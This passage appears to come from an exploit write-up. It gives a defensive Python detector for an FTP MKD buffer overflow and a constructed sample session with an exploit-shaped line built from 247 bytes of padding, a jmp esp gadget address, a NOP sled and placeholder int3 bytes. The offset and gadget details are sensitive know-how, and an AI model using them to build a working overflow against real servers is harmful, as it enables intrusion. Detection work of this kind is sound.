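From the defender's side, the payload layout described above (247 bytes of padding, a packed gadget address, a NOP sled, then shellcode) has a recognisable shape on the FTP control channel. The following added example (not code from the original post) scans captured command lines for MKD arguments that exceed the return-address offset, contain non-printable bytes, or carry the packed 0x7c86467b gadget; the sample session and the alert thresholds are constructed here.

```python
# Added example: detection logic for the MKD overflow shape over FTP command lines.
import struct

RET_OFFSET = 247              # bytes of MKD argument before the saved EIP (Step 2)
JMP_ESP_GADGET = 0x7c86467b   # kernel32.dll jmp esp gadget used in Step 3


def parse_ftp_command(line):
    """Split one control-channel line into (VERB, argument bytes)."""
    line = line.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    return verb.upper(), arg


def inspect_ftp_line(line):
    """Return a list of alert strings for one command line (empty if benign)."""
    verb, arg = parse_ftp_command(line)
    name = verb.decode("ascii", "replace")
    alerts = []
    if len(arg) > RET_OFFSET:
        alerts.append("%s argument of %d bytes exceeds the %d-byte return-address offset"
                      % (name, len(arg), RET_OFFSET))
    if any(b < 0x20 or b > 0x7e for b in arg):
        alerts.append("%s argument contains non-printable bytes" % name)
    if struct.pack("<L", JMP_ESP_GADGET) in arg:
        alerts.append("%s argument contains the packed jmp esp gadget address" % name)
    return alerts


def inspect_ftp_session(lines):
    """Map the index of every offending line to its alerts."""
    return {i: a for i, a in enumerate(inspect_ftp_line(l) for l in lines) if a}


# Constructed sample session: a benign MKD followed by one shaped like the
# exploit (padding, packed gadget, NOP sled, int3 bytes standing in for shellcode).
SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"PASS anonymous\r\n",
    b"MKD uploads\r\n",
    b"MKD " + b"A" * RET_OFFSET + struct.pack("<L", JMP_ESP_GADGET)
    + b"\x90" * 100 + b"\xcc" * 16 + b"\r\n",
    b"QUIT\r\n",
]

if __name__ == "__main__":
    for idx, alerts in inspect_ftp_session(SAMPLE_SESSION).items():
        for alert in alerts:
            print("line %d: %s" % (idx, alert))
```

The length rule is the one that matters for any MKD overflow of this server; the gadget-address rule only catches this post's exact gadget and is there to show how a known-bad constant is matched.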